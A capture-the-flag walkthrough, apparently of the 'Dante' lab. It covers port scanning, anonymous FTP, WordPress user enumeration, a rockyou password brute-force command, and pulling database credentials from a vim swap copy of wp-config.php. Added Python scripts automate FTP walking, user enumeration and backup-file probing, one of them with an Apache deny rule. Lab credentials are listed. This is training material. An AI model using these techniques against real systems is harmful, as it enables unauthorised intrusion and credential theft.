Rustscan

rustscan -a 10.10.110.100 --ulimit 5000 -- -sC -sV -oA nmap -Pn

rustscan -a 172.16.2.5 --ulimit 5000 -- -Pn -sV --script vuln

Output

PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 7
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.1.100 is not the same as 10.10.110.100

22/tcp    open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 8fa2ffcf4e3eaa2bc26ff45a2ad9e9da (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtTLxLag6I25W/4MyXLNSNylWF6JL7BB9D/wK7yPZkTK0PX62N52x788lVBYZjuBvqN2wobnG5HMZvaneZaezpyi/bLGhdnERknUixrO6efcXebZFgJx5LyHENJpP5XxBpUdrczuM3/zBY1mpeBDWTMrJQLK31Sh/RxCNOlayM/DewYZmP8KCGnB0OR/BlR3dvtBOBdbuJQn+xoL6jbPjSQzTEFO/si2OwiIb0lW+PxC8RLIXulKav9k8wIFTZOqCICfnIGGIOg1LaUUtp/qt0csEQMDnCiTdgzFyi7m9yY6t8hZGCXMR8Z9RmbH8VuPbO8mRfMIxMda+rXmE8u0KUV2YW/ICeGNzle65o01YXzI4z/yzsj0HdANxMpzyYlSbNgIEo5yyGsnNHWBun3Vd5Px4QPwy//4X3od5tfi6W6XKHxK/ZFeT8nbGyoV47ozLxOFXYeTQ72RSYKENuFmn6VLyMH/C0JXFiwV5FNFqvJgmpEM9ba/3bDznTG0QUm48=
|   256 07838eb6f7e672e965db42fdedd693ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVJJ8GPg11pc5bNU14qHtur8E0nGBUzMRB+9M+jdVF/l6+zNeA9aKzsCs/tT/46e7Qb9xhfSyRpSNDa/I49FOc=
|   256 1345c5cadba6b4ae9c097d21cd9d74f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAXEXWWafJIXJTRj8o05r1Ia4C++zzVfM7t+8MzY1cMj
 
 
 
65000/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/wordpress DANTE{Y0u_Cant_G3t_at_m3_br0!}
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Port 21 vsFTPd 3.0.3

Anonymous login is allowed. The server advertises an internal address (172.16.1.100) in its PASV replies, which is why the nmap ftp-anon script could not fetch a listing; the passive command below toggles the client out of passive mode so the data connection is opened from the server side instead.

ftp 10.10.110.100
anonymous
anonymous

passive
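The same anonymous walk, scripted so the PASV address mismatch does not break it. This is an added example, not part of the original write-up: the 227 reply and the LIST lines used for the offline check are constructed, and the class and function names (PinnedPassiveFTP, walk, split_listing) are my own.

```python
import re
import sys
from ftplib import FTP

# Constructed sample of the 227 reply vsftpd sends here: it advertises its
# internal address 172.16.1.100 although we connected to 10.10.110.100, which
# is why the nmap ftp-anon script could not fetch a directory listing.
SAMPLE_PASV_REPLY = "227 Entering Passive Mode (172,16,1,100,150,120)."

# Constructed LIST lines in vsftpd's ls-style format (illustrative, not a
# capture from the target).
SAMPLE_LISTING = [
    "drwxr-xr-x    4 ftp      ftp          4096 Jan 01 12:00 Transfer",
    "-rw-r--r--    1 ftp      ftp           342 Jan 01 12:00 todo.txt",
]


def parse_pasv(reply):
    """Extract (ip, port) from a 227 reply; the port is p1*256 + p2."""
    m = re.search(r"(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)", reply)
    if not m:
        raise ValueError("malformed 227 reply: %r" % reply)
    a, b, c, d, p1, p2 = (int(x) for x in m.groups())
    return "%d.%d.%d.%d" % (a, b, c, d), (p1 << 8) | p2


def pasv_target(reply, control_host):
    """Return (host, port, rewritten): keep the advertised IP only if it is the
    host we already talk to, otherwise pin the data connection to control_host."""
    ip, port = parse_pasv(reply)
    if ip != control_host:
        return control_host, port, True
    return ip, port, False


class PinnedPassiveFTP(FTP):
    """ftplib client whose data connections always go to the control host.
    Recent CPython does this by default (trust_server_pasv_ipv4_address is
    False); the override makes the behaviour explicit on older versions."""

    def makepasv(self):
        reply = self.sendcmd("PASV")
        host, port, _ = pasv_target(reply, self.sock.getpeername()[0])
        return host, port


def split_listing(lines, path):
    """Split ls-style LIST output into (dirs, files) holding full paths."""
    dirs, files = [], []
    for line in lines:
        parts = line.split(None, 8)
        if len(parts) < 9:
            continue  # "total N" or blank lines
        full = path.rstrip("/") + "/" + parts[8]
        (dirs if line.startswith("d") else files).append(full)
    return dirs, files


def walk(ftp, path="/", depth=0, max_depth=4):
    """Recursively list the share; returns every file path found."""
    lines = []
    ftp.dir(path, lines.append)
    dirs, files = split_listing(lines, path)
    for d in dirs:
        if depth < max_depth:
            files.extend(walk(ftp, d, depth + 1, max_depth))
    return files


def main(host):
    ftp = PinnedPassiveFTP(host, timeout=10)
    ftp.login()  # no arguments = anonymous login
    for f in walk(ftp):
        print(f)
        if f.endswith(".txt"):
            ftp.retrlines("RETR " + f, print)
    ftp.quit()


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "10.10.110.100")
```

Run it with the target address as the first argument; it prints every path under the anonymous root and dumps any .txt file it finds, so todo.txt is read in the same pass.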

Enumeration

There is a Transfer directory with two subdirectories, Incoming and Outgoing.

Incoming Directory

The Incoming directory contains one file, todo.txt.

Outgoing Directory

The Outgoing directory appears to be empty.

todo.txt

  • Finalize Wordpress permission changes - PENDING
  • Update links to to utilize DNS Name prior to changing to port 80 - PENDING
  • Remove LFI vuln from the other site - PENDING
  • Reset James’ password to something more secure - PENDING
  • Harden the system prior to the Junior Pen Tester assessment - IN PROGRESS

Port 65000 http

Browsing to the site on this port returns the default Apache page.

Enumeration

robots.txt

Visiting http://10.10.110.100:65000/robots.txt gives us the first flag and a disallowed path.

Output
User-agent: Googlebot
User-agent: AdsBot-Google
Disallow: /wordpress
Disallow: DANTE{Y0u_Cant_G3t_at_m3_br0!}

feroxbuster

feroxbuster -k -u http://10.10.110.100:65000 -C 404,405,410 -m GET,POST -e -x php,html,txt
  0: running      http://10.10.110.100:65000/
  1: running      http://10.10.110.100:65000/wordpress/
  2: running      http://10.10.110.100:65000/wordpress/wp-content/
  3: running      http://10.10.110.100:65000/wordpress/wp-admin/
  4: complete     http://10.10.110.100:65000/wordpress/wp-includes/
  6: running      http://10.10.110.100:65000/icons/
 13: running      http://10.10.110.100:65000/wordpress/wp-content/plugins/
 14: running      http://10.10.110.100:65000/wordpress/wp-content/themes/
 15: complete     http://10.10.110.100:65000/wordpress/wp-admin/images/
 16: complete     http://10.10.110.100:65000/wordpress/wp-admin/js/
 17: complete     http://10.10.110.100:65000/wordpress/wp-admin/includes/
 18: complete     http://10.10.110.100:65000/wordpress/wp-admin/css/
 19: running      http://10.10.110.100:65000/wordpress/wp-admin/user/
 44: complete     http://10.10.110.100:65000/wordpress/wp-content/uploads/
224: running      http://10.10.110.100:65000/wordpress/wp-admin/network/
225: complete     http://10.10.110.100:65000/wordpress/wp-admin/maint/
289: complete     http://10.10.110.100:65000/wordpress/wp-includes/sodium_compat/
348: running      http://10.10.110.100:65000/wordpress/wp-includes/random_compat/
355: complete     http://10.10.110.100:65000/wordpress/wp-includes/customize/
368: running      http://10.10.110.100:65000/icons/small/
382: complete     http://10.10.110.100:65000/wordpress/wp-includes/ID3/
410: running      http://10.10.110.100:65000/wordpress/wp-includes/certificates/
442: complete     http://10.10.110.100:65000/wordpress/wp-includes/js/
453: complete     http://10.10.110.100:65000/wordpress/wp-includes/SimplePie/
560: running      http://10.10.110.100:65000/wordpress/wp-includes/blocks/
600: complete     http://10.10.110.100:65000/wordpress/wp-includes/images/
602: complete     http://10.10.110.100:65000/wordpress/wp-includes/IXR/
606: complete     http://10.10.110.100:65000/wordpress/wp-includes/Requests/
608: complete     http://10.10.110.100:65000/wordpress/wp-includes/theme-compat/
705: running      http://10.10.110.100:65000/wordpress/wp-includes/Text/
751: complete     http://10.10.110.100:65000/wordpress/wp-includes/css/
810: running      http://10.10.110.100:65000/wordpress/wp-includes/widgets/
816: complete     http://10.10.110.100:65000/wordpress/wp-includes/pomo/
825: complete     http://10.10.110.100:65000/wordpress/wp-includes/rest-api/

The robots.txt entry and the feroxbuster results confirm that a WordPress site is hosted under /wordpress.

WPSCAN

wpscan --url http://10.10.110.100:65000/wordpress --enumerate vp,u,vt,tt --verbose
Interesting results

Users found (credentials are noted next to a user where they were recovered):
  1. admin (WordPress)
  2. james : Toyota (WordPress)
  3. kevin
  4. balthazar : TheJoker12345! (NIX01)
  5. AJ
  6. Nathan
  7. shaun : password

Looking at the todo.txt found on the FTP share, the james user should have a weak password and the "other site" should have an LFI.
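What wpscan's user enumeration does under the hood, as an added example that is not part of the original write-up: it reads /wp-json/wp/v2/users and walks /?author=N looking for the 301 to /author/<slug>/. The responses in FAKE_SITE are constructed so the script runs offline; pass a real base URL (ending in a slash) to run it against a target.

```python
import json
import re
import sys
from urllib.error import HTTPError
from urllib.parse import urljoin
from urllib.request import HTTPRedirectHandler, build_opener

# Constructed responses standing in for the target (not captured output).
FAKE_BASE = "http://10.10.110.100:65000/wordpress/"
FAKE_SITE = {
    FAKE_BASE + "wp-json/wp/v2/users": (
        200, {}, b'[{"id":1,"slug":"admin","name":"admin"},'
                 b'{"id":2,"slug":"james","name":"James"}]'),
    FAKE_BASE + "?author=1": (301, {"Location": FAKE_BASE + "author/admin/"}, b""),
    FAKE_BASE + "?author=2": (301, {"Location": FAKE_BASE + "author/james/"}, b""),
    FAKE_BASE + "?author=3": (301, {"Location": FAKE_BASE + "author/kevin/"}, b""),
}


def fake_fetch(url):
    """Offline transport: look the URL up in FAKE_SITE, anything else is a 404."""
    return FAKE_SITE.get(url, (404, {}, b""))


class _NoRedirect(HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # surface 3xx as HTTPError instead of following it


def http_fetch(url):
    """Live transport: (status, headers, body) without following redirects."""
    opener = build_opener(_NoRedirect())
    try:
        with opener.open(url, timeout=10) as r:
            return r.status, {k.title(): v for k, v in r.headers.items()}, r.read()
    except HTTPError as e:
        return e.code, {k.title(): v for k, v in e.headers.items()}, b""


def users_from_rest(body):
    """/wp-json/wp/v2/users lists users with published posts: {id: slug}."""
    try:
        data = json.loads(body)
    except ValueError:
        return {}
    if not isinstance(data, list):
        return {}
    return {u["id"]: u["slug"] for u in data if isinstance(u, dict) and "slug" in u}


def slug_from_author_redirect(location):
    """WordPress 301s /?author=N to /author/<slug>/ when the ID exists."""
    m = re.search(r"/author/([^/?#]+)/?", location or "")
    return m.group(1) if m else None


def enumerate_users(base, fetch, max_author_id=10):
    """Combine both techniques; returns {slug: id}. `base` must end with '/'."""
    found = {}
    status, _, body = fetch(urljoin(base, "wp-json/wp/v2/users"))
    if status == 200:
        for uid, slug in users_from_rest(body).items():
            found[slug] = uid
    for uid in range(1, max_author_id + 1):
        status, headers, _ = fetch("%s?author=%d" % (base, uid))
        if status in (301, 302):
            slug = slug_from_author_redirect(headers.get("Location"))
            if slug:
                found.setdefault(slug, uid)
    return found


if __name__ == "__main__":
    live = len(sys.argv) > 1
    target = sys.argv[1] if live else FAKE_BASE
    users = enumerate_users(target, http_fetch if live else fake_fetch)
    for slug, uid in sorted(users.items(), key=lambda kv: kv[1]):
        print(uid, slug)
```

The author-ID walk only yields a redirect when pretty permalinks are enabled; with plain permalinks the request returns 200 and the slug has to be read from the page body instead, which this example does not do.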

Bruteforce
wpscan --url http://10.10.110.100:65000/wordpress --passwords /usr/share/wordlists/rockyou.txt
Results

wpscan reported the location of a wp-config.php .swp file, but the password attack itself was too slow to recover a password (it runs against every enumerated user; restricting it with --usernames james would have been faster).

Opening the file showed that it is a vim swap file.

Recovering vim swp file
vim -r wp-config.php.swp
:w wp-config.php
Loot
/** MySQL database username */
define( 'DB_USER', 'shaun' );
 
/** MySQL database password */
define( 'DB_PASSWORD', 'password' );
 
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
 
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
 
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
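The general form of this finding, as an added example that is not part of the original write-up: editors and admins leave swap and backup copies (.swp, ~, .bak, ...) next to files like wp-config.php, and Apache serves them as plain files because they no longer end in .php. The script lists the usual variants, probes them, and tags a hit as a Vim swap file by its b0VIM header; DENY_PATTERN is the FilesMatch rule I would add to the vhost, checked here against the same list. The FAKE_SITE response is constructed so the block runs offline.

```python
import re
import sys
from urllib.error import HTTPError, URLError
from urllib.request import urlopen

# Apache rule (added example) denying dotfiles and editor/backup artefacts.
# The Python regex is the same pattern, used below to check coverage.
DENY_PATTERN = r"(^\.|~$|\.(swp|swo|bak|old|orig|save|dist)$|^#.*#$)"
APACHE_DENY_RULE = '<FilesMatch "%s">\n    Require all denied\n</FilesMatch>\n' % DENY_PATTERN


def backup_candidates(path):
    """Names an editor or admin typically leaves next to a file such as wp-config.php."""
    d, _, base = path.rpartition("/")
    p = d + "/" if d else ""
    names = {
        p + "." + base + ".swp",  # vim swap for an open buffer
        p + "." + base + ".swo",  # vim swap when .swp already exists
        p + base + ".swp",        # non-dot variant, the name this write-up found
        p + base + "~",           # vim/emacs backup
        p + "#" + base + "#",     # emacs autosave
    }
    for ext in ("bak", "old", "orig", "save", "dist"):
        names.add(p + base + "." + ext)
    return sorted(names)


def classify(body):
    """Vim swap files start with 'b0VIM'; anything else is reported as 'file'."""
    return "vim-swap" if body[:5] == b"b0VIM" else "file"


def probe(base_url, path, fetch):
    """Request every candidate under base_url; returns [(url, kind)] for 200s."""
    hits = []
    for name in backup_candidates(path):
        url = base_url.rstrip("/") + "/" + name
        status, body = fetch(url)
        if status == 200:
            hits.append((url, classify(body)))
    return hits


def is_blocked(name):
    """True if the Apache rule above would deny this file name."""
    return re.search(DENY_PATTERN, name.rsplit("/", 1)[-1]) is not None


def http_fetch(url):
    """Live transport: (status, first 4 KiB of body)."""
    try:
        with urlopen(url, timeout=10) as r:
            return r.status, r.read(4096)
    except HTTPError as e:
        return e.code, b""
    except URLError:
        return 0, b""


# Constructed offline transport: only the swap file "exists" on the fake site.
FAKE_SWP = b"b0VIM 8.1\x00" + b"\x00" * 32
FAKE_SITE = {"http://10.10.110.100:65000/wordpress/wp-config.php.swp": (200, FAKE_SWP)}


def fake_fetch(url):
    return FAKE_SITE.get(url, (404, b""))


if __name__ == "__main__":
    live = len(sys.argv) > 1
    base = sys.argv[1] if live else "http://10.10.110.100:65000/wordpress"
    for url, kind in probe(base, "wp-config.php", http_fetch if live else fake_fetch):
        print(kind, url)
    print(APACHE_DENY_RULE)
```

Give the script the WordPress base URL as its first argument to probe a live host; without arguments it runs against the constructed fake. The deny rule deliberately leaves .txt alone so robots.txt keeps working.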

Browsing the website

Browsing the website revealed some more users; they are added to the list above from user number 3 onwards.